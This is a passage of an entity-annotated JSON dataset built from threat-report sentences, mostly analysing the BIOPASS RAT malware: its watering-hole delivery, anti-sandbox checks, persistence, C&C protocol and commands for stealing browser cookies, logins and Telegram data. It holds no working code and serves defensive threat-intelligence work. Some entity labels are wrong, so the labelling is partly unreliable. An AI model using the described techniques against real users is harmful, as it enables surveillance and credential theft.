scanning, lateral movement detection, posture management and other capabilities, joint customers will have a powerful set of integrated offerings to deliver simple, all-in-one cloud security and compliance.","entities":[{"id":48282,"label":"SOFTWARE","start_offset":18,"end_offset":26}],"relations":[],"Comments":[]} {"id":3163,"text":"In addition, this move from AWS validates our XDR strategy, which is focused on using as many data sources as possible to enhance detection and response.","entities":[{"id":48283,"label":"identity","start_offset":28,"end_offset":31}],"relations":[],"Comments":[]} {"id":3164,"text":"The bottom line is that security takes a village.","entities":[],"relations":[],"Comments":[]} {"id":3165,"text":"Customers, cloud providers and security vendors have a shared responsibility to work together as the threat landscape continues to evolve.","entities":[],"relations":[],"Comments":[]} {"id":3166,"text":"That’s what we’ll continue to do, expanding and deepening our strategic partnerships with AWS and other providers in a collective effort to make the digital world safer.","entities":[{"id":48284,"label":"identity","start_offset":90,"end_offset":93}],"relations":[],"Comments":[]} {"id":3167,"text":" Tags Cloud | Latest News | Malware | APT & Targeted Attacks |","entities":[],"relations":[],"Comments":[]} {"id":3168,"text":"Compliance & Risks | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":3169,"text":"We discovered a new malware that targets online gambling companies in China via a watering hole attack, in which visitors are tricked into downloading a malware loader disguised as a legitimate installer for well-known apps such as Adobe Flash Player or Microsoft Silverlight.","entities":[{"id":48286,"label":"attack-pattern","start_offset":82,"end_offset":102},{"id":48287,"label":"attack-pattern","start_offset":126,"end_offset":150},{"id":48291,"label":"malware","start_offset":16,"end_offset":27},{"id":48285,"label":"location","start_offset":70,"end_offset":75},{"id":48289,"label":"SOFTWARE","start_offset":254,"end_offset":275},{"id":48290,"label":"identity","start_offset":41,"end_offset":66},{"id":48288,"label":"SOFTWARE","start_offset":232,"end_offset":250}],"relations":[{"id":396,"from_id":48291,"to_id":48290,"type":"targets"},{"id":397,"from_id":48290,"to_id":48285,"type":"located-at"},{"id":398,"from_id":48291,"to_id":48286,"type":"uses"},{"id":399,"from_id":48291,"to_id":48287,"type":"uses"}],"Comments":[]} {"id":3170,"text":"Closer examination of the loader shows that it loads either a Cobalt Strike shellcode or a previously undocumented backdoor written in Python, a new type of malware that we found to be named BIOPASS RAT (remote access trojan).","entities":[{"id":48293,"label":"tools","start_offset":62,"end_offset":75},{"id":48294,"label":"SOFTWARE","start_offset":135,"end_offset":141},{"id":48292,"label":"malware","start_offset":191,"end_offset":202}],"relations":[],"Comments":[]} {"id":3171,"text":"BIOPASS RAT possesses basic features found in other malware, such as file system assessment, remote desktop access, file exfiltration, and shell command execution.","entities":[{"id":48295,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":3172,"text":"It also has the ability to compromise the private information of its victims by stealing web browser and instant messaging client data.","entities":[],"relations":[],"Comments":[]} {"id":3173,"text":"What makes BIOPASS RAT particularly interesting is that it can sniff its victim’s screen by abusing the framework of Open Broadcaster Software (OBS) Studio, a popular live streaming and video recording app, to establish live streaming to a cloud service via Real-Time Messaging Protocol (RTMP).","entities":[{"id":48296,"label":"malware","start_offset":11,"end_offset":22},{"id":48298,"label":"SOFTWARE","start_offset":258,"end_offset":293},{"id":48297,"label":"SOFTWARE","start_offset":117,"end_offset":148}],"relations":[{"id":400,"from_id":48296,"to_id":48297,"type":"targets"}],"Comments":[]} {"id":3174,"text":"In addition, the attack misuses the object storage service (OSS) of Alibaba Cloud (Aliyun) to host the BIOPASS RAT Python scripts as well as to store the exfiltrated data from victims.","entities":[{"id":48300,"label":"malware","start_offset":103,"end_offset":114},{"id":48299,"label":"Infrastucture","start_offset":68,"end_offset":90}],"relations":[{"id":401,"from_id":48299,"to_id":48300,"type":"hosts"}],"Comments":[]} {"id":3175,"text":" We consider BIOPASS RAT as still being actively developed.","entities":[{"id":48301,"label":"malware","start_offset":13,"end_offset":24}],"relations":[],"Comments":[]} {"id":3176,"text":"For example, some markers that we discovered during our analysis refer to different versions of RAT code, such as “V2” or “BPSV3”.","entities":[],"relations":[],"Comments":[]} {"id":3177,"text":"Many of the loaders that we found were used to load Cobalt Strike shellcode by default instead of the BIOPASS RAT malware.","entities":[{"id":48302,"label":"tools","start_offset":52,"end_offset":65},{"id":48303,"label":"malware","start_offset":102,"end_offset":113}],"relations":[],"Comments":[]} {"id":3178,"text":"Furthermore, BIOPASS RAT also creates scheduled tasks to load the Cobalt Strike shellcode during the initialization, indicating that the malicious actor behind the attack still heavily relies on Cobalt Strike.","entities":[{"id":48304,"label":"malware","start_offset":13,"end_offset":24},{"id":48305,"label":"tools","start_offset":66,"end_offset":79},{"id":48306,"label":"tools","start_offset":195,"end_offset":208}],"relations":[{"id":402,"from_id":48304,"to_id":48305,"type":"uses"}],"Comments":[]} {"id":3179,"text":" We also found several clues that show how the malware might be connected with the Winnti Group(also known as APT41). ","entities":[{"id":48308,"label":"threat-actor","start_offset":110,"end_offset":115},{"id":48307,"label":"threat-actor","start_offset":83,"end_offset":95}],"relations":[{"id":403,"from_id":48307,"to_id":48308,"type":"duplicate-of"}],"Comments":[]} {"id":3180,"text":"In this blog entry, we will dive deeper into BIOPASS RAT with a detailed technical analysis of the infection chain, the different components of the malware, and any possible associations with Winnti.","entities":[{"id":48309,"label":"threat-actor","start_offset":192,"end_offset":198},{"id":48310,"label":"malware","start_offset":45,"end_offset":56}],"relations":[{"id":404,"from_id":48310,"to_id":48309,"type":"related-to"}],"Comments":[]} {"id":3181,"text":" Infection chain ","entities":[],"relations":[],"Comments":[]} {"id":3182,"text":"The initial delivery mechanism of BIOPASS RAT uses of a watering hole, a compromised website in which the malicious actors inject their custom JavaScript code to deliver malware.","entities":[{"id":48312,"label":"attack-pattern","start_offset":56,"end_offset":69},{"id":48311,"label":"malware","start_offset":34,"end_offset":45}],"relations":[{"id":405,"from_id":48311,"to_id":48312,"type":"uses"}],"Comments":[]} {"id":3183,"text":"In most of the cases that we observed, the attackers usually place their injection script in their target’s online support chat page.","entities":[],"relations":[],"Comments":[]} {"id":3184,"text":" Figure 1. The login panel of BIOPASS RAT Figure 2. Code showing the watering hole attack injection The injected script will try to scan the affected host by sending HTTP requests to a list of ports.","entities":[{"id":48313,"label":"malware","start_offset":34,"end_offset":45}],"relations":[],"Comments":[]} {"id":3185,"text":"If it receives any response with an expected string from these ports, the script will stop.","entities":[],"relations":[],"Comments":[]} {"id":3186,"text":"This step is likely designed to avoid attacking an already infected victim.","entities":[],"relations":[],"Comments":[]} {"id":3187,"text":"We found that the BIOPASS RAT has the ability to open an HTTP service running on localhost on a port chosen from a hard-coded list.","entities":[{"id":48314,"label":"malware","start_offset":18,"end_offset":29}],"relations":[],"Comments":[]} {"id":3188,"text":"This functionality allows the script to identify whether the victim has already been infected by their malware.","entities":[],"relations":[],"Comments":[]} {"id":3189,"text":"It conducts this identification by testing whether the port is open or not and then by checking the response. Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":3190,"text":"The script used to check for existing BIOPASS RAT infections If the script confirms that the visitor has not yet been infected, it will then replace the original page content with the attackers’ own content.","entities":[{"id":48315,"label":"malware","start_offset":38,"end_offset":49}],"relations":[],"Comments":[]} {"id":3191,"text":"The new page will show an error message with an accompanying instruction telling website visitors to download either a Flash installer or a Silverlight installer, both of which are malicious loaders.","entities":[{"id":48317,"label":"SOFTWARE","start_offset":140,"end_offset":151},{"id":48316,"label":"SOFTWARE","start_offset":119,"end_offset":124}],"relations":[],"Comments":[]} {"id":3192,"text":"It is important to note that both Adobe Flash and Microsoft Silverlight have already been deprecated by their respective vendors.","entities":[{"id":48318,"label":"SOFTWARE","start_offset":34,"end_offset":45},{"id":48319,"label":"SOFTWARE","start_offset":50,"end_offset":71}],"relations":[],"Comments":[]} {"id":3193,"text":" Figure 4.","entities":[],"relations":[],"Comments":[]} {"id":3194,"text":"The fake Adobe Flash Player download page of the watering hole attack Figure 5.","entities":[{"id":48321,"label":"attack-pattern","start_offset":49,"end_offset":69},{"id":48320,"label":"SOFTWARE","start_offset":9,"end_offset":27}],"relations":[],"Comments":[]} {"id":3195,"text":"The fake Silverlight download page of the watering hole attack Figure 6.","entities":[{"id":48322,"label":"SOFTWARE","start_offset":9,"end_offset":20},{"id":48323,"label":"attack-pattern","start_offset":42,"end_offset":62}],"relations":[],"Comments":[]} {"id":3196,"text":"Anti-VM checks in sample c47fabc47806961f908bed37d6b1bbbfd183d564a2d01b7cae87bd95c20ff8a5 Figure 7.","entities":[{"id":9775,"label":"SHA2","start_offset":25,"end_offset":89}],"relations":[],"Comments":[]} {"id":3197,"text":"Check for zh-CN-preferred UI language in sample 89c0b2036ce8d1d91f6d8b8171219aafcd6237c811770fa16edf922cedfecc54 ","entities":[{"id":9779,"label":"SHA2","start_offset":48,"end_offset":112}],"relations":[],"Comments":[]} {"id":3198,"text":"The legitimate known application is downloaded and executed.","entities":[],"relations":[],"Comments":[]} {"id":3199,"text":"Authenticode-signed files are either downloaded from the official websites (as seen in sample c47fabc47806961f908bed37d6b1bbbfd183d564a2d01b7cae87bd95c20ff8a5) or are hosted on Alibaba Cloud OSS on the attackers’ account.","entities":[{"id":48324,"label":"Infrastucture","start_offset":177,"end_offset":194},{"id":9783,"label":"SHA1","start_offset":94,"end_offset":158}],"relations":[{"id":406,"from_id":48324,"to_id":9783,"type":"hosts"}],"Comments":[]} {"id":3200,"text":"Visual C++ runtime, a legitimate and signed vc_redist.x??.exe, and Python runtime are then downloaded.","entities":[{"id":48325,"label":"FILEPATH","start_offset":44,"end_offset":61},{"id":48326,"label":"SOFTWARE","start_offset":0,"end_offset":18},{"id":48327,"label":"SOFTWARE","start_offset":67,"end_offset":81}],"relations":[],"Comments":[]} {"id":3201,"text":"These files are also hosted on Alibaba Cloud OSS on an attacker-controlled account.","entities":[{"id":48328,"label":"Infrastucture","start_offset":31,"end_offset":48}],"relations":[],"Comments":[]} {"id":3202,"text":"The Python runtime is usually a ZIP file with all required executables, as well as the DLL and Python libraries necessary for running Python scripts on machines where Python is not installed.","entities":[{"id":48329,"label":"SOFTWARE","start_offset":4,"end_offset":10},{"id":48330,"label":"SOFTWARE","start_offset":95,"end_offset":101},{"id":48331,"label":"SOFTWARE","start_offset":134,"end_offset":140},{"id":48332,"label":"SOFTWARE","start_offset":167,"end_offset":173}],"relations":[],"Comments":[]} {"id":3203,"text":"Scheduled tasks that are activated on a new login are created.","entities":[],"relations":[],"Comments":[]} {"id":3204,"text":"These tasks can run a BPS backdoor or a Cobalt Strike loader.","entities":[{"id":48334,"label":"tools","start_offset":40,"end_offset":53},{"id":48333,"label":"malware","start_offset":22,"end_offset":34}],"relations":[],"Comments":[]} {"id":3205,"text":" Figure 8.","entities":[],"relations":[],"Comments":[]} {"id":3206,"text":"Code excerpt from the scheduled task We also noticed the path string “ServiceHub”, which is a path to the extracted Python runtime.","entities":[{"id":9799,"label":"attack-pattern","start_offset":22,"end_offset":36}],"relations":[],"Comments":[]} {"id":3207,"text":"After the hex decoding of the arguments, we get a Python one-liner that downloads additional Python scripts from the cloud.","entities":[{"id":48335,"label":"SOFTWARE","start_offset":50,"end_offset":56},{"id":48336,"label":"SOFTWARE","start_offset":93,"end_offset":100}],"relations":[],"Comments":[]} {"id":3208,"text":" Figure 9.","entities":[],"relations":[],"Comments":[]} {"id":3209,"text":"Python code for downloading additional components from Alibaba Cloud OSS Figure 10.","entities":[{"id":48337,"label":"Infrastucture","start_offset":55,"end_offset":72}],"relations":[],"Comments":[]} {"id":3210,"text":"The BIOPASS RAT infection flow ","entities":[{"id":9806,"label":"malware","start_offset":4,"end_offset":15}],"relations":[],"Comments":[]} {"id":3211,"text":"Examining the BIOPASS RAT modules We observed a few scheduled tasks being created, with the number dependent on the analyzed sample.","entities":[{"id":9807,"label":"malware","start_offset":14,"end_offset":25}],"relations":[],"Comments":[]} {"id":3212,"text":"In the following section, we provide an analysis for each important backdoor module.","entities":[],"relations":[],"Comments":[]} {"id":3213,"text":"The cdaemon module One of the modules used is called “cdaemon”.","entities":[],"relations":[],"Comments":[]} {"id":3214,"text":"At the time of our research into this threat, only the “print(1)” command is able to be executed.","entities":[],"relations":[],"Comments":[]} {"id":3215,"text":"An old sample of the module (30ccfbf24b7c8cc15f85541d5ec18feb0e19e75e1e4d2bca9941e6585dad7bc7) is likely a watchdog to check the status of another module that is known as “c1222”. The malicious actors can change this behavior by replacing the content of the cdaemon.txt service in the cloud so that when combined with the regular execution of the scheduled task, the cdaemon task can behave like a backdoor.","entities":[{"id":48338,"label":"malware","start_offset":172,"end_offset":177},{"id":48339,"label":"FILEPATH","start_offset":259,"end_offset":270},{"id":9814,"label":"SHA2","start_offset":29,"end_offset":93},{"id":9821,"label":"attack-pattern","start_offset":348,"end_offset":362}],"relations":[{"id":407,"from_id":9814,"to_id":48338,"type":"related-to"}],"Comments":[]} {"id":3216,"text":" Figure 11.","entities":[],"relations":[],"Comments":[]} {"id":3217,"text":"The content of the cdaemon.txt backdoor The c1222 module","entities":[{"id":48341,"label":"malware","start_offset":48,"end_offset":53},{"id":48340,"label":"FILEPATH","start_offset":19,"end_offset":30}],"relations":[],"Comments":[]} {"id":3218,"text":"The second scheduled task is called “c1222.txt,” which is a Python code run by a previously downloaded Python runtime.","entities":[{"id":48343,"label":"SOFTWARE","start_offset":60,"end_offset":66},{"id":48344,"label":"SOFTWARE","start_offset":103,"end_offset":109},{"id":48342,"label":"FILEPATH","start_offset":37,"end_offset":46}],"relations":[],"Comments":[]} {"id":3219,"text":"This code runs an HTTP server that listens on predefined ports.","entities":[],"relations":[],"Comments":[]} {"id":3220,"text":"If accessed by an HTTP client, it returns a marker value.","entities":[],"relations":[],"Comments":[]} {"id":3221,"text":" Figure 12.","entities":[],"relations":[],"Comments":[]} {"id":3222,"text":"The list of predefined ports to bind an HTTP service to, which is reversed After accessing the infected machine with an HTTP server bound to a predefined port","entities":[],"relations":[],"Comments":[]} {"id":3223,"text":", the module returns the marker value.","entities":[],"relations":[],"Comments":[]} {"id":3224,"text":" Figure 13.","entities":[],"relations":[],"Comments":[]} {"id":3225,"text":"The HTTP service with marker BPSV3 We also observed other markers — such as, “cs_online”, “online”, and “dm_online”.","entities":[],"relations":[],"Comments":[]} {"id":3226,"text":"The purpose of the HTTP service is to act as a marker for an infected machine to avoid repeated infection, as aforementioned in the infection chain section.","entities":[],"relations":[],"Comments":[]} {"id":3227,"text":"The most important task of the c1222 script is to download, decode, and execute the Cobalt Strike shellcode.","entities":[{"id":48346,"label":"malware","start_offset":31,"end_offset":36},{"id":48345,"label":"tools","start_offset":84,"end_offset":97}],"relations":[],"Comments":[]} {"id":3228,"text":"Based on the platform, it downloads a file with an encoded shellcode (sc3.txt, x64.txt), and then decodes it (the shellcode is base85 and hex-encoded). Figure 14. Decoding the Cobalt Strike shellcode The big module (BIOPASS RAT)","entities":[{"id":48347,"label":"FILEPATH","start_offset":70,"end_offset":77},{"id":48349,"label":"tools","start_offset":181,"end_offset":194},{"id":48348,"label":"FILEPATH","start_offset":79,"end_offset":86},{"id":9839,"label":"malware","start_offset":225,"end_offset":236}],"relations":[],"Comments":[]} {"id":3229,"text":"The third scheduled task —is called “big.txt”— is responsible for implementing the BIOPASS RAT malware.","entities":[{"id":48350,"label":"FILEPATH","start_offset":37,"end_offset":44},{"id":9841,"label":"attack-pattern","start_offset":10,"end_offset":24},{"id":9842,"label":"malware","start_offset":83,"end_offset":94}],"relations":[],"Comments":[]} {"id":3230,"text":"This is a Python-based backdoor that is distributed in plain text or compiled with Nuitka or PyArmor and PyInstaller.","entities":[{"id":48351,"label":"SOFTWARE","start_offset":83,"end_offset":89},{"id":48352,"label":"SOFTWARE","start_offset":93,"end_offset":100},{"id":48353,"label":"SOFTWARE","start_offset":105,"end_offset":116},{"id":48354,"label":"SOFTWARE","start_offset":10,"end_offset":16}],"relations":[],"Comments":[]} {"id":3231,"text":"When the malware starts, it checks whether the file with the hard-coded name “%PUBLIC%\/20200318” exists.","entities":[{"id":48355,"label":"FILEPATH","start_offset":78,"end_offset":95}],"relations":[],"Comments":[]} {"id":3232,"text":"This file is a marker to determine if the scheduled task of the backdoor has been installed.","entities":[],"relations":[],"Comments":[]} {"id":3233,"text":" If the file (that is, the marker) is not found, the backdoor creates a new one and writes the current timestamp onto it.","entities":[],"relations":[],"Comments":[]} {"id":3234,"text":"The malware will then delete the scheduled tasks added by the loader and add two new scheduled tasks that are listed in Table 1.","entities":[],"relations":[],"Comments":[]} {"id":3235,"text":"Task Name Behavior ServiceHub Executes Python with a parameter that is the Python script to download and execute Cobalt Strike loader script “c1222” module ShellExperienceHost Executes Python with a parameter that is the Python script to download and execute BIOPASS RAT script “big” module Table 1.","entities":[{"id":48356,"label":"malware","start_offset":146,"end_offset":151},{"id":48357,"label":"SOFTWARE","start_offset":79,"end_offset":85},{"id":48358,"label":"SOFTWARE","start_offset":43,"end_offset":49},{"id":48359,"label":"SOFTWARE","start_offset":227,"end_offset":233},{"id":48360,"label":"SOFTWARE","start_offset":191,"end_offset":197},{"id":9858,"label":"tools","start_offset":117,"end_offset":130},{"id":9860,"label":"malware","start_offset":265,"end_offset":276}],"relations":[],"Comments":[]} {"id":3236,"text":"The scheduled tasks created by BIOPASS RAT The BIOPASS RAT malware loads a Python script, “online.txt” that will open an HTTP server that listens on one of the following port numbers: 43990, 43992, 53990, 33990, 33890, 48990, 12880, 22880, 32880, 42880, 52880, or 62880.","entities":[{"id":48362,"label":"FILEPATH","start_offset":93,"end_offset":103},{"id":48361,"label":"SOFTWARE","start_offset":77,"end_offset":83},{"id":9862,"label":"malware","start_offset":31,"end_offset":42},{"id":9863,"label":"malware","start_offset":49,"end_offset":60}],"relations":[],"Comments":[]} {"id":3237,"text":"The HTTP server does nothing but returns string “BPSV3” to request.","entities":[],"relations":[],"Comments":[]} {"id":3238,"text":" A second HTTP server will also be created to listen on one of the aforementioned port numbers.","entities":[],"relations":[],"Comments":[]} {"id":3239,"text":"The second HTTP server behaves the same as the first but returns a string, “dm_online”, instead.","entities":[],"relations":[],"Comments":[]} {"id":3240,"text":"These are the markers of infection as previously mentioned.","entities":[],"relations":[],"Comments":[]} {"id":3241,"text":"After the servers are established and running, the backdoor creates an execution root directory in the folder “%PUBLIC%\/BPS\/V3\/”.","entities":[{"id":48363,"label":"FILEPATH","start_offset":111,"end_offset":127}],"relations":[],"Comments":[]} {"id":3242,"text":" Figure 15.","entities":[],"relations":[],"Comments":[]} {"id":3243,"text":"The script of a simple HTTP server to return string “dm_online” If the malware finds that the system username is “vbccsb”","entities":[],"relations":[],"Comments":[]} {"id":3244,"text":", it will stop.","entities":[],"relations":[],"Comments":[]} {"id":3245,"text":"It must be noted that “vbccsb” is the default username on ThreatBook Cloud Sandbox, a popular alternative to VirusTotal in China.","entities":[{"id":48364,"label":"location","start_offset":123,"end_offset":128},{"id":48365,"label":"SOFTWARE","start_offset":109,"end_offset":119},{"id":48366,"label":"SOFTWARE","start_offset":58,"end_offset":82}],"relations":[],"Comments":[]} {"id":3246,"text":"If the backdoor finds that the file “debug” present inside the root directory, it will wait for 130 seconds and then continue with execution. Figure 16.","entities":[],"relations":[],"Comments":[]} {"id":3247,"text":"The script used to check the username and debug mode ","entities":[],"relations":[],"Comments":[]} {"id":3248,"text":"Next, the backdoor will try to read the file “bps.key” inside the root directory.","entities":[{"id":48367,"label":"FILEPATH","start_offset":46,"end_offset":53}],"relations":[],"Comments":[]} {"id":3249,"text":"This file contains the victim ID assigned by the command-and-control (C&C) server.","entities":[],"relations":[],"Comments":[]} {"id":3250,"text":"If the file hasn’t been created, it will set the victim ID to a null value until the C&C server assigns it.","entities":[],"relations":[],"Comments":[]} {"id":3251,"text":"At the end of initialization, it collects the information of the victim’s system and initializes values in the global config variable that contains important configuration information.","entities":[],"relations":[],"Comments":[]} {"id":3252,"text":"This includes the backdoor version (we observed V2 and V3), access keys, endpoint address, the bucket name for Alibaba Cloud OSS, and a URL for downloading the utility sc.exe that is used for taking screenshots.","entities":[{"id":48369,"label":"FILEPATH","start_offset":168,"end_offset":174},{"id":48368,"label":"Infrastucture","start_offset":111,"end_offset":128}],"relations":[],"Comments":[]} {"id":3253,"text":" Figure 17.","entities":[],"relations":[],"Comments":[]} {"id":3254,"text":"The BPS backdoor global configuration variable The backdoor communicates with the C&C server using the Socket.io protocol.","entities":[{"id":48370,"label":"malware","start_offset":4,"end_offset":16}],"relations":[],"Comments":[]} {"id":3255,"text":"The C&C communication is encrypted with AES ECB algorithm using a hard-coded password, ZLIB compression, and base85 encoding.","entities":[],"relations":[],"Comments":[]} {"id":3256,"text":"Figures 18 and 19 show how the malware sends the “join” event to initialize C&C communication and attach the victim’s encrypted data.","entities":[],"relations":[],"Comments":[]} {"id":3257,"text":" Figure 18.","entities":[],"relations":[],"Comments":[]} {"id":3258,"text":"Encoded “join” event sent to the C&C server Figure 19.","entities":[],"relations":[],"Comments":[]} {"id":3259,"text":"Decoded “join” event sent to the C&C server.","entities":[],"relations":[],"Comments":[]} {"id":3260,"text":"It’s important to note that attributes like IP address, computer and username, architecture, installed antivirus, and geolocation are included.","entities":[],"relations":[],"Comments":[]} {"id":3261,"text":" The BIOPASS RAT malware registers three custom Socket.io event handlers:","entities":[{"id":9917,"label":"malware","start_offset":8,"end_offset":19}],"relations":[],"Comments":[]} {"id":3262,"text":"1. The “notice” handler is used for checking the connection with the C&C server.","entities":[],"relations":[],"Comments":[]} {"id":3263,"text":"The backdoor regularly sends a “notice” event to the server and records the timestamp if it also receives a “notice” event as the response.","entities":[],"relations":[],"Comments":[]} {"id":3264,"text":"If the malware doesn’t receive any “notice” event within a hard-coded threshold period, it will restart.","entities":[],"relations":[],"Comments":[]} {"id":3265,"text":"2. The “set key” handler is used for accepting the victim ID, a random string with six characters, assigned by the C&C server.","entities":[],"relations":[],"Comments":[]} {"id":3266,"text":"It will be attached in each of commands sent from the server and will also be used as the folder name on a cloud storage service to save the stolen data.","entities":[],"relations":[],"Comments":[]} {"id":3267,"text":"The victim ID will be stored in the “bps.key” file.","entities":[{"id":48371,"label":"FILEPATH","start_offset":37,"end_offset":44}],"relations":[],"Comments":[]} {"id":3268,"text":" 3. The “accept task” handler is the main handler used to process the command sent from the C&C server and to return the execution result.","entities":[],"relations":[],"Comments":[]} {"id":3269,"text":"We share more details of each command in the next section.","entities":[],"relations":[],"Comments":[]} {"id":3270,"text":"After the malware joins the C&C server, the server will assign a victim ID with “set key” event and send multiple “accept task” events with the commands “ScreenShot”, “SnsInfo”, “PackingTelegram”, “GetBrowsersCookies”, “GetBrowsersLogins”, “GetBrowsersHistories”, and “GetBrowsersBookmarks” to instruct the malware to collect private data from the victim.","entities":[],"relations":[],"Comments":[]} {"id":3271,"text":"A closer look at the BIOPASS RAT commands","entities":[{"id":9935,"label":"malware","start_offset":21,"end_offset":32}],"relations":[],"Comments":[]} {"id":3272,"text":"The BIOPASS RAT malware implements multiple commands, most of which are self-explanatory.","entities":[{"id":9936,"label":"malware","start_offset":4,"end_offset":15}],"relations":[],"Comments":[]} {"id":3273,"text":"A summary of commands is listed in Table 2, while additional details of some commands are explained in the following section.","entities":[],"relations":[],"Comments":[]} {"id":3274,"text":" Command Behavior Compress_Files Compresses specified files or directories to a ZIP archive Decompress_File Extracts files from a specified ZIP archive AutoRun Creates a scheduled task for persistence CloseEverything Kills the Everything process with the command “TASKKILL \/F \/IM Everything.exe” OpenEverything Downloads and runs Everything from voidtools CloseFFmpegLive Kills the FFmpeg process with the command “TASKKILL \/F \/IM ffmpeg.exe” OpenFFmpegLive Downloads and runs FFmpeg (for screen video capture) DeleteFile Deletes files or directories at specified locations CreateDir Creates a directory at a specified location ShowFiles Gets the disk partition or lists a specified directory with detailed information, including file name, file path, size, create time, and time of modification Download_File Downloads a URL and saves the file to a specified location Upload_File Uploads the victim’s files to cloud storage uUninstall Kills the BIOPASS RAT process and deletes installed files. CloseObsLive Kills the OBS process with command “TASKKILL \/F \/IM obs64.exe” Open_Obs_Live Downloads OBS Studio and starts live streaming ProcessList Lists processes on the victim’s environment and their process identifier (PID) KillProcess Kills the process specified by PID with the TASKKILL command ScreenShot Takes a screenshot and uploads it to cloud storage Shell Executes commands or scripts (subcommands with prefixes subprocess, python, noreturn, getversion, restart) SnsInfo Lists QQ, WeChat, and Aliwangwang directories InstallTcpdump Downloads and installs the tcpdump tool PackingTelegram Compresses and uploads Telegram's “tdata” directory to cloud storage CloseProxy Kills frpc process with command “TASKKILL \/F \/IM frpc.exe” OpenProxy Downloads and installs the frp proxy client in the “%PUBLIC%” folder OpenVnc Downloads and installs jsmpeg-vnc tool in the “%PUBLIC%\/vnc\/” folder CloseVnc Kills the VNC process with the command “TASKKILL \/F \/IM vdwm.exe” GetBrowsersCookies Decrypts the cookie file of the browser and uploads it to cloud storage GetBrowsersLogins Decrypts the login file of the browser and uploads it to cloud storage GetBrowsersHistories Uploads the history file of the browser to cloud storage GetBrowsersBookmarks Uploads the bookmark file of the browser to cloud storage Table 2.","entities":[{"id":48372,"label":"FILEPATH","start_offset":289,"end_offset":303}],"relations":[],"Comments":[{"id":1,"comment":"exclude"}]} {"id":3275,"text":"BIOPASS RAT commands OpenEverything The malware downloads “Everything” files if the “Everything” binary is not found in the “%TEMP%” folder.","entities":[{"id":48373,"label":"FILEPATH","start_offset":128,"end_offset":134},{"id":9976,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":3276,"text":"It then changes the port number of the HTTP server inside the configuration file and starts the Everything process, which will open an HTTP server to allow the threat actor to access the file system of the victim.","entities":[],"relations":[],"Comments":[]} {"id":3277,"text":"OpenFFmpegLive The malware downloads FFmpeg files if they are not found on the victim’s machine.","entities":[{"id":48374,"label":"malware","start_offset":0,"end_offset":14},{"id":48375,"label":"SOFTWARE","start_offset":38,"end_offset":44}],"relations":[],"Comments":[]} {"id":3278,"text":"Next, it starts the FFmpeg process to monitor the victim’s desktop via RTMP live streaming to the cloud.","entities":[{"id":48376,"label":"SOFTWARE","start_offset":20,"end_offset":26}],"relations":[],"Comments":[]} {"id":3279,"text":"The malicious actor can then connect to the relevant RTMP address to watch the streaming.","entities":[],"relations":[],"Comments":[]} {"id":3280,"text":"Open_Obs_Live","entities":[],"relations":[],"Comments":[]} {"id":3281,"text":" The malware downloads OBS Studio files if the OBS folder and config file are not found in the root directory.","entities":[{"id":48378,"label":"malware","start_offset":5,"end_offset":12},{"id":48377,"label":"SOFTWARE","start_offset":23,"end_offset":33}],"relations":[{"id":408,"from_id":48378,"to_id":48377,"type":"downloads"}],"Comments":[]} {"id":3282,"text":"It writes the basic config and RTMP config of OBS and then starts the OBS process to monitor the victim’s desktop using RTMP live streaming to the cloud.","entities":[],"relations":[],"Comments":[]} {"id":3283,"text":"The malicious actor can connect to the relevant RTMP address to watch the streaming.","entities":[],"relations":[],"Comments":[]} {"id":3284,"text":" Figure 20.","entities":[],"relations":[],"Comments":[]} {"id":3285,"text":"The script used to download OBS Studio, prepare the configuration, and start the process ScreenShot","entities":[{"id":48379,"label":"SOFTWARE","start_offset":28,"end_offset":38}],"relations":[],"Comments":[]} {"id":3286,"text":"The malware downloads the screenshot-cmd tool if it is not found in the root directory.","entities":[],"relations":[],"Comments":[]} {"id":3287,"text":"It takes a screenshot of the victim’s screen with the tool and saves it as a PNG file with a random number as the file name.","entities":[],"relations":[],"Comments":[]} {"id":3288,"text":" The malware will then upload the screenshot files to cloud storage.","entities":[],"relations":[],"Comments":[]} {"id":3289,"text":"Shell","entities":[],"relations":[],"Comments":[]} {"id":3290,"text":"The malware uses a number of methods to execute the shell command or script.","entities":[],"relations":[],"Comments":[]} {"id":3291,"text":"The “Shell” command instructs the malware to execute a command using the Python function “win32api.ShellExecute” and to return the result to a C&C server, applying a 60-second timeout for command execution.","entities":[{"id":48380,"label":"SOFTWARE","start_offset":73,"end_offset":79}],"relations":[],"Comments":[]} {"id":3292,"text":"If the command has one of the following prefixes, it will perform a specific behavior:","entities":[],"relations":[],"Comments":[]} {"id":3293,"text":"1. “subprocess”: executes a system command using the Python function “subprocess.Popen”.","entities":[{"id":48381,"label":"SOFTWARE","start_offset":58,"end_offset":64}],"relations":[],"Comments":[]} {"id":3294,"text":"2. “python”: executes a Python script delivered with the command.","entities":[{"id":48382,"label":"SOFTWARE","start_offset":29,"end_offset":35}],"relations":[],"Comments":[]} {"id":3295,"text":"3. “noreturn”: executes a system command using the Python function “win32api.ShellExecute” without waiting for the result.","entities":[{"id":48383,"label":"SOFTWARE","start_offset":56,"end_offset":62}],"relations":[],"Comments":[]} {"id":3296,"text":"4. “getversion”: returns the string “20200202”.","entities":[],"relations":[],"Comments":[]} {"id":3297,"text":"5. “restart”: kills the process itself and restarts it via scheduled malicious tasks. SnsInfo","entities":[],"relations":[],"Comments":[]} {"id":3298,"text":"The command will list the installation directory of several popular instant messaging applications including WeChat, QQ, and Aliwangwang and return this information to the C&C server.","entities":[{"id":48384,"label":"SOFTWARE","start_offset":109,"end_offset":115},{"id":48386,"label":"SOFTWARE","start_offset":125,"end_offset":136},{"id":48385,"label":"SOFTWARE","start_offset":117,"end_offset":119}],"relations":[],"Comments":[]} {"id":3299,"text":"Figures 21 and 22 show the result of running “SnsInfo” command to enumerate messengers.","entities":[],"relations":[],"Comments":[]} {"id":3300,"text":" Figure 21.","entities":[],"relations":[],"Comments":[]} {"id":3301,"text":"Encoded SUBMIT RESULT command sent to C&C server Figure 22. Decoded SUBMIT RESULT command sent to C&C server None of the Chinese messenger applications has been installed on our testing machine, which explains the result seen in the images.","entities":[],"relations":[],"Comments":[]} {"id":3302,"text":" GetBrowsersCookies This command is designed to steal cookie information from browsers.","entities":[],"relations":[],"Comments":[]} {"id":3303,"text":"It will read the “Local State” file to grab the AES secret key of Google Chrome-based 